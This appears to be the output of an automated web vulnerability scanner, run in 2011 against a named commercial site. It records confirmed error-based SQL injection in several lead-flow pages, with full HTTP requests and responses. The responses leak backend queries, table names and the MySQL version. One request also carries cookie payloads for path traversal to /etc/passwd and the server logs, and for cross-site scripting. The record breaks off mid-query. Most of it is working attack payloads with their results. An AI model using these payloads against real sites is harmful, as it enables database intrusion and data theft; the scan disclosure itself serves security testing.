GET /ppc/leadflow/bulo00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mdu7f547n6tf7da5n81d2luvh2; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=unct3s9hs5novtpifms5a4nlq4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B(select+1+and+row(1%2..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=il1g31fhpk4io0k4bi5mh3sor7; path=/
Content-Length: 4878
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ca56a19o1tpmn35n39hblthd63; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select 